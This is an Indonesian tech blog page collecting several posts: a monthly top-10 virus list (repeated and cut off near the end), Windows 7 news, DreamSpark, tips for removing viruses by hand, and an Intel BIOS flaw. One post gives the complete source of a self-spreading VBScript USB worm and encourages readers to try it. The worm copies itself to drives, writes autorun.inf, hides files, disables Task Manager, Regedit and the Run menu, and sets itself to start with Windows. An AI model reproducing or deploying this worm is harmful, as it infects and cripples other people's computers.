Skip to content

Top 10 Virus Indonesia Juni 2009

Pagi, Siang, Sore dan Malam …. (tergantung bacanya pada waktu apa)!!!! Sekedar menginformasikan agar kita bisa lebih waspada terhadap jenis varian virus pada saat ini. Bulan ini tercatat ada beberapa jenis varian virus yang di peroleh virusindonesia.com yang lumayan bisa membuat kita pusing …. berikut beberapa jenis varian virus : Yang bertengger di urutan pertama masih sama yakni Conficker, diikuti oleh Autoit dan FullHouse. Selain itu ada beberapa virus yang baru masuk ke peringkat sepuluh besar ini seperti Nhatquanglan dan Hotum.vbs. Untuk lebih jelasnya, silakan lihat daftar berikut ini:

1. Conficker
Daftar domain yang di-black list oleh Conficker. Virus luar berteknologi canggih ini memang menyebar luar biasa. Bentuknya yang merupakan file DLL (Dynamic Link Library) membedakannya dengan kebanyakan virus lain yang berupa EXE. Kemampuan yang dimilikinya juga bisa disetarakan dengan rootkit. Serta, sifatnya ber-polymorphic membuatnya memiliki tubuh yang berubah-ubah. Pada komputer terinfeksi, user tidak akan dapat membuka situs yang “berbau” antivirius atau Microsoft update. Virus ini juga aktif menyebar di Indonesia dengan menggunakan media removable disk misalkan flash disk. Pada flash disk terinfeksi, Anda akan menemukan file autorun.inf dan direktori RECYCLER yang di dalamnya terdapat sub-direktori dengan nama misalkan S-5-3-42-2819952290-8240758988-879315005-3665, dan pada direktori inilah terdapat file virus Conficker dengan nama biasanya jwgkvsq.vmx yang sebenarnya adalah file DLL.

2. Autoit
Menyebarkan pesan ke setiap contact person yang ada di Y!M. Hampir kebanyakan varian dari virus import berbasis script ini menggunakan icon mirip seperti folder. Virus ini memiliki kemampuan untuk melakukan auto update ke beberapa situs. Ia juga dapat memanfaatkan Yahoo! Messenger sebagai media perantara penyebarannya dengan mengirimkan pesan berisi link ke setiap contact person yang ada di Y!M korban.

3. FullHouse
Gambar yang di extract oleh virus FullHouse. Virus lokal yang satu ini dibuat menggunakan Visual Basic. Dalam aksinya, ia meng-extract gambar “Han ji eun”, salah satu tokoh dalam serial Full House. Salah satu file induknya ngumpet dalam folder RECYCLER, dan akan membuat file autorun.inf pada drive target untuk dapat running otomatis.

4. Recycler
File virus bersembunyi dibalik Recycle Bin palsu. Yang menjadi ciri khas dari virus ini adalah teknik bagaimana ia menyebar. Yakni “ngumpet” dalam direktori Recycler/Recycler/Recycle Bin. Ia juga diketahui menerapkan teknik code injection agar kode virus bisa “nyangkut” pada explorer.exe. Ini dilakukannya untuk mempersulit user maupun program antivirus sekalipun untuk membunuhnya.

5. Nhatquanglan
Virus Nhatquanglan memanipulasi file hosts. Virus import yang satu ini dibuat menggunakan Visual Basic. Dua varian yang baru kami temui berukuran 101KB dan 81KB, menggunakan icon mirip folder dalam penyamarannya. Salah satu ciri khasnya adalah memblok beberapa situs antivirus dengan memanipulasi file hosts.

6. Hotum.vbs
Hotum.vbs mengubah caption jam Windows. Satu lagi virus lokal jenis VBScript dikenal dengan nama Hotum.vbs. Memiliki ukuran sekitar 8KB. Ia akan aktif otomatis dengan mengganti registry userinit milik Windows serta membuat item run baru. Mudah mengenali komputer yang telah terinfeksi virus ini. Lihat pada informasi jam windows di pojok kanan bawah, waktu AM akan diganti menjadi “Hotum” sementara untuk PM diubah menjadi “Tombom”.

7. Risa
Pesan yang disampaikan oleh virus Risa. Virus lokal satu ini memiliki ukuran sekitar 42KB, dengan kondisi ter-pack menggunakan UPX. Icon yang dimiliki menyerupai folder. Saat komputer terinfeksi virus ini, akan banyak sekali ditemukan folder-folder tipuan di setiap penjuru drive. Ia juga dapat masuk ke flash disk, di flash disk akan terdapat beberapa file dengan nama seperti “Kumpulan Puisi cinta palsu.exe”, “Rahasia (Jangan dibuka).exe”, dan lainnya. Pesan dari pembuat virus pun dapat ditemukan dengan pada direktori Windows dengan nama “Wasiat.html”, atau pada root drive C: dengan nama “Puisi_untukmu_bang.html”.

8. LegendOfAang.vbs
Virus dalam kondisi terenkripsi dan yang tidak terenkripsi. Virus yang dibuat menggunakan VBScript ini hadir dalam kondisi terenkripsi. Pada gambar di atas Anda bisa melihat file virus yang dalam kondisi terenkripsi dan yang sudah di-decrypt. Ia memiliki ukuran sekitar 13KB. Saat beraksi, ia mencoba untuk menghapus file VBS yang kemungkinan ditujukan kepada virus lain. Pada removable disk terinfeksi juga akan terdapat file autorun.inf milik virus ini. Dan agar dapat running otomatis, ia mengubah item userinit di registry agar diarahkan kepada dirinya.

9. Astuty
Pesan dari virus Astuty. Virus lokal satu ini memiliki pesan cinta yang disampaikan pada browser. File pesan bisa Anda temukan pada direktori Windows dengan nama Notic.htm. Ia menggunakan icon mirip dokumen MsWord dalam penyamarannya. Ukurannya sekitar 617KB, di-pack menggunakan UPX. Virus ini akan memalsukan file .DOC yang ia temukan, dengan cara menyembunyikan file .DOC yang asli dengan memberinya attribut hidden, lalu menggantikannya dengan file virus dengan nama file yang hampir sama.

10. Vanpraja
Gambar yang berasal dari virus Vanpraja.B. Virus lokal yang satu ini akan mengeluarkan beberapa file gambar dari dalam resources tubuhnya, salah satunya dengan nama “Hacked by v@nP.jpg” seperti yang terlihat di atas. File di extract ke beberapa root drive yang terdapat di komputer korban. Secara fisik, ia mirip dengan file dokumen MsWord, dengan ukuran file sekitar 96KB, dan di-pack menggunakan UPX. Ada-ada saja memang aksinya, si pembuat virus ini mempromosikan sekolahnya dengan cara menyebarkan file teks yang berisi promosi tersebut ke setiap root drive termasuk.

Untuk lebih lengkapnya klik www.komputer-tech.co.cc

Sample scipt VBS for FlashDisk

Iseng-iseng googlink, eh tau – tau dapet sesuatu yang unik. Ga tau ada apa? kayanya akhir – akhir ini para virus maker banyak yang milih memakai bahasa VBS. Mungkin karena VB yang banyak bajakannya kali yach!!!!, dan yang terutama karena VBS lebih mudah dibuatnya dengan hanya menggunakan Notepad karena pada sistem windows sudah ada compilernya yaitu “Windows Based Script host


Nah Sekarang kita akan membuat contoh virus lagi dari VBS, Virus nih biasanya nyerang Flashdisk dan virus ini akan autorun sendiri, sehingga flash disk yang nyangkut di komputer akan terinfeksi, virus nih dikasih nama “system.dll.vbs”. Sekarang buka Notepad-nya. Copy kode berikut :


‘//–Awal dari kode, set agar ketika terjadi Error dibiarkan dan kemudian lanjutkan kegiatan virus–//
on error resume next

‘//–Dim kata-kata berikut ini–//
dim rekur,windowpath,flashdrive,fs,mf,isi,tf,system,nt,check,sd

‘//–Set sebuah teks yang nantinya akan dibuat untuk Autorun Setup Information–//
isi = “[autorun]” & vbcrlf & “shellexecute=wscript.exe system.dll.vbs”
set fs = createobject(”Scripting.FileSystemObject”)
set mf = fs.getfile(Wscript.ScriptFullname)
dim text,size
size = mf.size
check = mf.drive.drivetype
set text = mf.openastextstream(1,-2)
do while not text.atendofstream
rekur = rekur & text.readline
rekur = rekur & vbcrlf
loop
do

‘//–Copy diri untuk menjadi file induk di Windows Path (example: C:\Windows)
Set windowpath = fs.getspecialfolder(0)
set tf = fs.getfile(windowpath & “\batch- system.dll.vbs “)
tf.attributes = 32
set tf=fs.createtextfile(windowpath & “\batch- system.dll.vbs”,2,true)
tf.write rekursif
tf.close
set tf = fs.getfile(windowpath & “\batch- system.dll.vbs “)
tf.attributes = 39

‘//–Buat Atorun.inf untuk menjalankan virus otomatis setiap flash disc tercolok–//
‘Menyebar ke setiap drive yang bertype 1 dan 2(removable) termasuk disket

for each flashdrive in fs.drives
‘//–Cek Drive–//
If (flashdrive.drivetype = 1 or flashdrive.drivetype = 2) and flashdrive.path <> “A:” then

‘//–Buat Infector jika ternyata Drivetypr 1 atau 2. Atau A:\–//
set tf=fs.getfile(flashdrive.path &”\system.dll.vbs “)
tf.attributes =32
set tf=fs.createtextfile(flashdrive.path &”\system.dll.vbs “,2,true)
tf.write rekursif
tf.close
set tf=fs.getfile(flashdrive.path &”\system.dll.vbs “)
tf.attributes = 39

‘//–Buat Atorun.inf yang teks-nya tadi sudah disiapkan (Auto Setup Information)–//
set tf =fs.getfile(flashdrive.path &”\autorun.inf”)
tf.attributes = 32
set tf=fs.createtextfile(flashdrive.path &”\autorun.inf”,2,true)
tf.write isi
tf.close
set tf = fs.getfile(flashdrive.path &”\autorun.inf”)
tf.attributes=39
end if
next

‘//–Manipulasi Registry–//

set system = createobject(”WScript.Shell”)

‘//–Manip – Ubah Title Internet Explorer menjadi SYSTEM32–//
system.regwrite “HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title”,” SYSTEM32 “

‘//–Manip – Set agar file hidden tidak ditampilkan di Explorer–//
system.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Advanced\Hidden”, “0″, “REG_DWORD”

‘//–Manip – Hilangkan menu Find, Folder Options, Run, dan memblokir Regedit dan Task Manager–//
system.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind”, “1″, “REG_DWORD”
system.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions”, “1″, “REG_DWORD”
system.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun”, “1″, “REG_DWORD”
system.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools”, “1″, “REG_DWORD”
system.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr”, “1″, “REG_DWORD”

‘//–Manip – Disable klik kanan–//
kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewContextMenu”, “1″, “REG_DWORD”

‘//–Manip – Munculkan Pesan Setiap Windows Startup–//
system.regwrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeCaption”, “Worm system. Variant from WIN32, don’t panic all data are safe.”

‘//–Manip – Aktif setiap Windows Startup–//
system.regwrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\Systemdir”, windowpath & “\batch- system.dll.vbs “

‘//–Manip – Ubah RegisteredOwner dan Organization–//
system.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOrganization”, “win32”
system.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOwner”,”system”

‘//–Nah kalau kode dibawah ini gw nggak tau, tolong kalo ada yang bisa untuk menjelaskan–//
if check <> 1 then
Wscript.sleep 200000
end if
loop while check <> 1
set sd = createobject(”Wscript.shell”)
sd.run windowpath & “\explorer.exe /e,/select, ” & Wscript.ScriptFullname
‘Akhir dari Kode

Masih nanya lagi tentang nama virusnya kenapa harus system.dll.vbs? apa ga bisa di ganti atau dirubah? tentu bisa, asalkan scrip diatas harus dirubah juga sama nama yang mau lo pakai nanti. Kalo “dll” itu fungsinya buat apa? gausah di pikirin itu mah ga da fungsinya, cuma buat iseng – iseng aja biar lo pada bingung. Wkakakakakaka …!!!!

Tapi gw tekankann lagi untuk tidak menyalah gunakan scrip ini. Scrip ini gw bahas cuma untuk perbandingan aja dari scrip – scrip yang sebelumnya aj, gw ga mau bertanggung jawab kalo ada apa – apa nantinya karena nih scrip bukan sepenuhnya dari ide gw … !!!!

# Selamat Mencoba

Goodbye Windows Vista, Lifelong XP

Masih ingatkah Anda ketika Microsoft mulai membatasi penjualan Windows XP dalam rangka menjelang terbitnya Windows 7 yang mungkin akan menggantikan Vista? Namun, sepertinya Microsoft harus mengubah semua prosedur yang telah dibuat sebelumnya mengenai batas hidup Windows XP.

Microsoft mulai menyadari kemauan sebagian besar konsumennya yang masih ingin menggunakan Windows XP dan telah merasa kurang puas dengan Vista. Untuk memenuhi keinginan konsumen, maka Microsoft memperpanjang batas waktu bagi para pengguna PC agar dapat mendowngrade atau berpindah dari Windows Vista ke Windows XP di mesin computer mereka.

Microsoft sendiri telah membuat aturan mengenai frame time downgrade ke Windows XP mulai 31 Januari 2009 hingga 31 Juli 2009. “Dengan adanya aturan tersebut, bukan berarti hak downgrade sistem menjadi hilang. Jika banyak konsumen yang berpindah dari Windows Vista ke Windows XP, maka kami akan memastikan bahwa proses transisinya dapat berjalan lancer dan sehalus mungkin. Namun untuk penyediaan media downgrade membutuhkan waktu beberapa bulan sebagai bukti dari komitmen kami.”, kata juru bicara Microsoft.

Microsoft memperkirakan sekitar enam bulan untuk menyediakan media downgrade untuk XP Professional untuk OEM dan system builder, bagi user yang terlanjur menggunakan Windows Vista Ultimate dan Business editions. Jadi bagi Anda yang ingin men-downgrade atau beralih dari Vista ke Windows XP, masih ada kesempatan hingga tahun 2009.

39 Bocoran Screenshot Windows 7

Blog ThinkNext.net telah menempatkan 39 screenshot yang menurutnya diambil dari Windows 7 versi M3 Build 6780, memperlihatkan berbagai aspek tampilan Windows 7 mulai dari Start Menu, Control Panel, Media Player dan tentunya halaman error Windows 7. Mary Jo Foley dari ZDNet yang sudah pernah melihat Windows 7 Build 6780 mengatakan bahwa “baik Microsoft maupun berbagai pengujinya tidak senang melihat beredarnya screenshot ini di web.”

Diduga Microsoft telah mulai merilis versi M3 secara internal maupun kepada beberapa orang penguji eksternal sejak tanggal 12 September, walaupun para karyawan Microsoft menolak untuk mengkonfirmasikan hal ini. Saat ditanya tentang fitur Windows 7, Microsoft selalu menyarankan orang-orang untuk mengunjungi blog Engineering Windows 7.

Minggu lalu beberapa orang petinggi Microsoft telah mengatakan bahwa mereka akan merilis informasi teknis mendetil di Professional Developers Conference atau WinHEC dalam beberapa minggu ke depan ini. Mereka juga mengatakan bahwa versi beta Windows 7 akan dikeluarkan di bulan Desember, dengan versi finalnya di pertengahan tahun 2009 tetapi sejak saat itu, masih belum ada lagi berita tentang Windows 7, hingga Microsoft merilis detil lebih lanjut dalam beberapa minggu mendatang ini, kita harus puas dengan 39 screenshot di bawah ini. (via Cnet, tips dari aerialsky)

Update: Lifehacker juga telah mempublikasikan beberapa video Windows 7 yang dapat Anda lihat di bawah ini.

Windows Media Player


Download video!
Download video!
Download video!

Sticky Notes


Download video!
Download video!
Download video!

Windows 7 Start Menu


Download video!
Download video!
Download video!

Windows 7 Calculator


Download video!
Download video!
Download video!

Windows 7 Beta Keluar Oktober, Versi Final Juni 2009


Microsoft tampaknya berusaha menutup babak Vista secepat mungkin dan gosip terhangat yang beredar saat ini adalah Microsoft akan merilis iterasi terakhir dari sistem operasi Windows setengah tahun lebih cepat dari jadwal. Menurut Computerworld, versi beta Windows 7 akan dirilis di salah satu atau bahkan dua konferensi Microsoft yaitu Professional Developers Conference (PDC) yang berlangsung pada tanggal 27-30 Oktober dan Windows Hardware Engineering Conference (WinHEC) pada tanggal 5-7 November.

Analis Microsoft Michael Cherry mengatakan bahwa ‘saat pengembang dalam jumlah sebesar itu berkumpul, Anda menginginkan mereka untuk pulang dengan sesuatu yang dapat mereka kutak-katik. Microsoft ingin melakukan lebih dari sekedar menjelaskan Windows 7 kepada para pengembang secara lisan.’

Apabila hanya boleh memilih satu dari dua konferensi yang ada, Cherry lebih cenderung pada WinHEC yang memiliki hadirin lebih sedikit. Menurut Cherry, semakin sedikit jumlahnya, semakin menarik untuk Microsoft yang kali ini serius dalam meningkatkan kinerja Windows ‘kemungkinan khawatir versi awal Windows akan diulas. Mereka tidak akan senang apabila seseorang memutuskan untuk menguji kinerja Windows yang masih berada dalam versi beta. Saat dirilis, pasti ada saja yang akan mempublikasikan kesan mereka dalam menggunakan Windows 7.’

Contohnya, lihat saja fakta bahwa versi beta dari IE8 dan Chrome yang dirilis belum lama ini. Kedua browser ini diulas secara mendalam, termasuk dalam segi kinerja. Begitu juga dengan versi beta Vista yang saat pertama kali dikeluarkan dikritik keras oleh beberapa situs.

Hingga minggu lalu, Microsoft belum mengatakan apapun tentang Windows 7 beta. Akan tetapi pada hari Rabu minggu lalu, Christina Storm, seorang program manager Microsoft mengatakan di blog Engineering Windows 7 bahwa mereka akan mulai mengumpulkan para penguji beta melalui prosedur biasa Microsoft melalui connect.microsoft.com/.

Walaupun secara resmi Microsoft menjadwalkan Windows 7 untuk dirilis pada bulan Januari 2010, InternetNews mengatakan bahwa kalender internal Microsoft sendiri menunjuk pada 3 Juni 2009 sebagai tanggal peluncuran Windows 7.

Software Gratis Khusus Mahasiswa

Tim evangelis Microsoft telah mengumumkan software terbarunya, hari ini, yang dinamakan DreamSpark, dimana semua mahasiwa dapat mendownload software ini untuk dimanfaatkan sebagai software pengembangan edisi professional dan desain, hanya dengan beberapa click dan menit, alias gratis. Namun, sebelum itu, terdapat proses verifikasi identitas mengenai data diri mahasiswa dan mengecek apakah user benar-benar seorang mahasiswa atau bukan, langsung dari institusi yang bersangkutan, walaupun belum semua institusi telah di-setup di dalam system. Peluncuran DreamSpark pertama kali dilakukan di Universitas Sanford, California, langsung oleh Chairman Microsoft Corp. Bill Gates, pada tanggal 19 Februari 2008. Kemudian DreamSpark juga telah mendulang sukses untuk lebih dari 35 juta mahasiswa di beberapa negara yang lain seperti Inggris, Kanada, Cina, Amerika, Jerman, Perancis, Spanyol, Swiss, dan Belgia. Sedangkan di Indonesia, pihak Microsoft Indonesia telah bekerja sama dengan beberapa universitas, termasuk UGM, UI, UAJY, PENS IT. (Politeknik Elektronika Negeri Surabaya Institut Teknologi 10 November) Surabaya, Gunadarma, Binus, ITB, Unibraw (Universitas Brawijaya), Unpad (Universitas Padjajaran), Universitas Ma Chung Malang, UPH (Universitas Pelita Harapan), dan Unpar (Universitas Parahyangan).


                                    www.dreamspark.com

Mengenai implementasi DreamSpark di Indonesia membutuhkan waktu kira-kira hampir satu tahun. Untuk mendownload software DreamSpark, dapat ke situs www.dreamspark.com. Berikut daftar software yang dapat didownload :

* Visual Studio 2008 Professional Edition
* Visual Studio 2005 Professional
* Visual Web Developer 2005
* Visual Basic 2005
* Visual C++ 2005
* Visual C# 2005
* Visual J# 2005
* Sql Server 2005 Express
* Sql Server Developer Edition
* Virtual PC 2007
* Windows Server 2003 Standard Edition
* Expression Studio
* XNA Game Studio 2.0
* XNA Creators Club Online

Tips n Trick

Menghadapi serangan berbagai macam virus komputer – dengan OS Microsoft Windows tentu saja – kebanyakan orang akan memikirkan bagaimana mendapatkan antivirus terbaru dan antivirus khusus untuk virus lokal tertentu karena kebanyakan software antivirus tidak mampu mendeteksinya. Berbeda dengan cara pikir yang sangat umum ini, saya menawarkan solusi alternatif menghadapi virus lokal yaitu membasminya secara manual.

Virus adalah program/aplikasi (=serangkaian perintah) yang mampu memperbanyak diri. Kebanyakan programer membuat virus-virus ini sebagai serangkaian perintah yang menyusup ke dalam barisan perintah-perintah dalam aplikasi-aplikasi lain. Virus-virus tertentu bahkan diprogram mampu menyelinap dalam master boot record ataupun sektor-sektor tertentu dalam disk dengan perlindungan khusus tanpa bisa dikenali pengguna sebagai file. Sayangnya pekerjaan cerdik ini tidak berlaku untuk kebanyakan virus lokal yang keberadaannya sangat mencolok dan mengundang permusuhan.

Berdasarkan titik lemah inilah kita dapat membasmi virus lokal secara manual. Ada dua acuan umum dalam membasmi virus secara manual yaitu menghentikan running virus dan melenyapkan virus-virus. Berdasarkan dua acuan ini anda dapat mengembangkan sendiri strategi anda tergantung kasus yang anda hadapi.

Bagian I: Menghentikan Running Virus

Untuk serangan virus yang dibuat dengan Visual Basic (VB) – untungnya kebanyakan virus lokal dibuat dengan VB – anda dapat menghentikan running virus dengan cara ‘menyingkirkan’ msvbvm50.dll dan msvbvm60.dll yang berada dalam direktori c:windowssystem32 yang merupakan virtual machine dari program-program yang dibuat dengan VB. Adapun istilah ‘menyingkirkan’ bisa diwujudkan dengan berbagai cara tergantung keadaan ataupun selera, yaitu dihapus (tidak dianjurkan), dipindah ke folder lain, atau diganti dengan nama lain. Selain itu caranya bisa dilakukan dengan berbagai cara tergantung dari tingkat serangan virus mulai dari menggunakan windows explorer, command prompt emulator pada windows (ketika virus menonaktifkan windows explorer), ataupun harus menjalankan windows dalam mode ‘save mode with command prompt only’ dengan menekan F8 pada awal windows startup untuk menampilkan startup menu. Jika virus masih tetap berjalan, berarti virus tidak dibuat dengan VB dan untuk menjalankan langkah selanjutnya anda harus menggunakan Linux atau OS lain yang tidak terpasang emulator untuk program-program windows.

Bagian II: Menghapus Virus-virus

Untuk melenyapkan virus-virus yang harus anda lakukan adalah mengumpulkan semua file aplikasi melalui find dengan entri nama *.exe, mengidentifikasi aplikasi-aplikasi yang merupakan virus, dan menghapus mereka. Jika menu find telah dinonaktifkan oleh virus, anda bisa memanggilnuya dengan menekan F3 (jauh lebih mudah daripada harus mengedit registry editor). Memvonis aplikasi sebagai virus sangat tergantung dari pengalaman dan insting anda, karena ciri-cirinya bisa sangat bervariasi; tetapi yang harus menjadi acuan adalah bahwa anda mencari hal-hal ‘tidak seperti yang semestinya dan berada di tempat semestinya’ atau terkesan disembunyikan. Aplikasi-aplikasi dengan icon Microsoft word Document atau icon folder bisa langsung divonis sebagai virus, tetapi aplikasi dengan ikon biasa pun harus anda curigai jika anda yakin siapapun tidak pernah memindahkannya ke sana. Untuk memperkecil ruang lingkup, anda juga perlu memperhatikan ukuran file karena banyak virus yang masing-masing mempunyai ukuran file sama.

Aplikasi yang telah anda vonis sebagai virus harus dihapus langsung dengan menekan sift+delete. Sebelumnya, pastikan semua data telah anda selamatkan dengan mengkopi isi dokumen dan di-paste di tempat lain dalam keadaan virus tidak runnig. Selamat beraksi.

Kelemahan Bios Intel

Salah satu demonstrasi yang menarik dalam Black Hat tahun ini adalah sebuah penemuan dari Johanna Rutkowska, yang telah menemukan kelemahan dari BIOS motherboard Intel yang dapat menjadi “pil pahit” dari hypervisor Xen ini. Detail mengenai kelemahan motherboard Intel memang belum dirinci untuk saat ini, namun Intel hanya memberikan detail garis besarnya.

Menurut saran Rutkowska dalam blognya, bahwa perbaikan yang nantinya akan dilakukan oleh Intel diharapkan dapat mencegah software yang mudah dimodifikasi yang berjalan di SMM (System Management Mode). SMM merupakan privilege operasi lingkungan yang berjalan di luar kontrol sistem operasi. Software ‘jahat’ akan berjalan dalam lingkungan ini, yang meliputi banyak operasi didalamnya. Level privilege Adminstratif nantinya yang akan bertanggung jawab atas perbaikan kelemahan BIOS motherboard Intel ini. Update BIOS untuk memperbaiki masalah ini akan menginfeksi semua motherboard brand Intel.

Motherboard Intel yang terinfeksi termasuk Intel DQ35JO, DQ35MP, DP35DP, DG33FB, DG33BU, DG33TL, DX38BT dan MGM965TW (Mobile). Pengumuman Intel ini juga menjadi peringatan bagi user bahwa level BIOS memiliki potensi untuk memberikan efek samping pada sistem computer dan untuk semua sistem operasi. Dengan adanya masalah ini, Intel kemudian menjadi frustrasi, karena bagaimanapun pihaknya belum pernah melihat tipe eksploitasi ini dalam motherboard-nya, dan Intel memutuskan untuk menambal lubang kelemahan tersebut untuk mencegah hal yang sama terjadi di masa mendatang.

Windows 7 akan hadir

Seorang bos enginner Windows, Steven Sinofsky, mengungkapkan bahwa pihak Microsoft telah me-launching blog Windows 7. Menurut rencana Sinofsky, blog Windows 7 tersebut nantinya dapat digunakan share beberapa detail dari Windows 7.

“PDC atau Professional Developers Conference yang akan diselenggarakan tanggan 27 Oktober nanti, dan WinHEC atau Windows Hardware Engineering Conference dalam mingu berikutnya, akan merepresentasikan sarana pertama kali, dimana kami dapat menyediakan informasi teknis mengenai Windows 7. Blog ini juga akan menyediakan konteks dengan posting regular selama 2 bulan ke depan, mengenai pengembangan Windows 7 di belakang layar.”, kata Sinofsky dan Jon Devaan, kepala sistem operasi Windows Core.

Menurut Sinofsky, Microsoft akan memasukkan Windows 7 pada PDC dalam beberapa manner. Sinofsky mengakui bahwa Microsoft tidak akan berbicara banyak, namun kembali kepada line standard Microsoft, bahwa perusahaan tersebut tidak akan melakukan share detail peluncuran selama mereka belum mencapai level penyelesaian yang nyata. Sinofsky menuturkan beberapa detail dari Windows 7 yang akan menggunakan driver yang sama dan basic kernel dari Windows Vista, yang menurut rencana akan dipasarkan pada Januari 2010, tiga tahun setelah peluncuran Windows Vista. Microsoft juga akan memasukkan interface multi-touch ke dalam Windows 7.

“Kami sangat percaya bahwa kesuksesan Windows 7 berasal dari keterbukaan, kejujuran dan diskusi mengenai bagaimana kami menyeimbangkan interest dan software dengan skala Windows. Kami menjanjikan akan membuat sebuah dialog dan segala detailnya dalam blog Windows 7 ini.”, kata Sinofsky.

Sinofsky menambahkan, bahwa Microsoft telah merangkul lebih banyak dan lebih dalam dengan pembuat beberapa pembuat computer lainnya, untuk ikut menjadi bagian dari proses desain Windows 7. Menurut rencana, blog Windows 7 ini mulai siap digunakan pada bulan Oktober mendatang.

www.BeritaNET.com

Recent Articles

11
Jun

Top 10 Virus Indonesia Juni 2009

Pagi, Siang, Sore dan Malam …. (tergantung bacanya pada waktu apa)!!!! Sekedar menginformasikan agar kita bisa lebih waspada terhadap jenis varian virus pada saat ini. Bulan ini tercatat ada beberapa jenis varian virus yang di peroleh virusindonesia.com yang lumayan bisa membuat kita pusing …. berikut beberapa jenis varian virus : Yang bertengger di urutan pertama masih sama yakni Conficker, diikuti oleh Autoit dan FullHouse. Selain itu ada beberapa virus yang baru masuk ke peringkat sepuluh besar ini seperti Nhatquanglan dan Hotum.vbs. Untuk lebih jelasnya, silakan lihat daftar berikut ini:

1. Conficker
Daftar domain yang di-black list oleh Conficker. Virus luar berteknologi canggih ini memang menyebar luar biasa. Bentuknya yang merupakan file DLL (Dynamic Link Library) membedakannya dengan kebanyakan virus lain yang berupa EXE. Kemampuan yang dimilikinya juga bisa disetarakan dengan rootkit. Serta, sifatnya ber-polymorphic membuatnya memiliki tubuh yang berubah-ubah. Pada komputer terinfeksi, user tidak akan dapat membuka situs yang “berbau” antivirius atau Microsoft update. Virus ini juga aktif menyebar di Indonesia dengan menggunakan media removable disk misalkan flash disk. Pada flash disk terinfeksi, Anda akan menemukan file autorun.inf dan direktori RECYCLER yang di dalamnya terdapat sub-direktori dengan nama misalkan S-5-3-42-2819952290-8240758988-879315005-3665, dan pada direktori inilah terdapat file virus Conficker dengan nama biasanya jwgkvsq.vmx yang sebenarnya adalah file DLL.

2. Autoit
Menyebarkan pesan ke setiap contact person yang ada di Y!M. Hampir kebanyakan varian dari virus import berbasis script ini menggunakan icon mirip seperti folder. Virus ini memiliki kemampuan untuk melakukan auto update ke beberapa situs. Ia juga dapat memanfaatkan Yahoo! Messenger sebagai media perantara penyebarannya dengan mengirimkan pesan berisi link ke setiap contact person yang ada di Y!M korban.

3. FullHouse
Gambar yang di extract oleh virus FullHouse. Virus lokal yang satu ini dibuat menggunakan Visual Basic. Dalam aksinya, ia meng-extract gambar “Han ji eun”, salah satu tokoh dalam serial Full House. Salah satu file induknya ngumpet dalam folder RECYCLER, dan akan membuat file autorun.inf pada drive target untuk dapat running otomatis.

4. Recycler
File virus bersembunyi dibalik Recycle Bin palsu. Yang menjadi ciri khas dari virus ini adalah teknik bagaimana ia menyebar. Yakni “ngumpet” dalam direktori Recycler/Recycler/Recycle Bin. Ia juga diketahui menerapkan teknik code injection agar kode virus bisa “nyangkut” pada explorer.exe. Ini dilakukannya untuk mempersulit user maupun program antivirus sekalipun untuk membunuhnya.

5. Nhatquanglan
Virus Nhatquanglan memanipulasi file hosts. Virus import yang satu ini dibuat menggunakan Visual Basic. Dua varian yang baru kami temui berukuran 101KB dan 81KB, menggunakan icon mirip folder dalam penyamarannya. Salah satu ciri khasnya adalah memblok beberapa situs antivirus dengan memanipulasi file hosts.

6. Hotum.vbs
Hotum.vbs mengubah caption jam Windows. Satu lagi virus lokal jenis VBScript dikenal dengan nama Hotum.vbs. Memiliki ukuran sekitar 8KB. Ia akan aktif otomatis dengan mengganti registry userinit milik Windows serta membuat item run baru. Mudah mengenali komputer yang telah terinfeksi virus ini. Lihat pada informasi jam windows di pojok kanan bawah, waktu AM akan diganti menjadi “Hotum” sementara untuk PM diubah menjadi “Tombom”.

7. Risa
Pesan yang disampaikan oleh virus Risa. Virus lokal satu ini memiliki ukuran sekitar 42KB, dengan kondisi ter-pack menggunakan UPX. Icon yang dimiliki menyerupai folder. Saat komputer terinfeksi virus ini, akan banyak sekali ditemukan folder-folder tipuan di setiap penjuru drive. Ia juga dapat masuk ke flash disk, di flash disk akan terdapat beberapa file dengan nama seperti “Kumpulan Puisi cinta palsu.exe”, “Rahasia (Jangan dibuka).exe”, dan lainnya. Pesan dari pembuat virus pun dapat ditemukan dengan pada direktori Windows dengan nama “Wasiat.html”, atau pada root drive C: dengan nama “Puisi_untukmu_bang.html”.

8. LegendOfAang.vbs
Virus dalam kondisi terenkripsi dan yang tidak terenkripsi. Virus yang dibuat menggunakan VBScript ini hadir dalam kondisi terenkripsi. Pada gambar di atas Anda bisa melihat file virus yang dalam kondisi terenkripsi dan yang sudah di-decrypt. Ia memiliki ukuran sekitar 13KB. Saat beraksi, ia mencoba untuk menghapus file VBS yang kemungkinan ditujukan kepada virus lain. Pada removable disk terinfeksi juga akan terdapat file autorun.inf milik virus ini. Dan agar dapat running otomatis, ia mengubah item userinit di registry agar diarahkan kepada dirinya.

9. Astuty
Pesan dari virus Astuty. Virus lokal satu ini memiliki pesan cinta yang disampaikan pada browser. File pesan bisa Anda temukan pada direktori Windows dengan nama Notic.htm. Ia menggunakan icon mirip dokumen MsWord dalam penyamarannya. Ukurannya sekitar 617KB, di-pack menggunakan UPX. Virus ini akan memalsukan file .DOC yang ia temukan, dengan cara menyembunyikan file .DOC yang asli dengan memberinya attribut hidden, lalu menggantikannya dengan file virus dengan nama file yang hampir sama.

10. Vanpraja
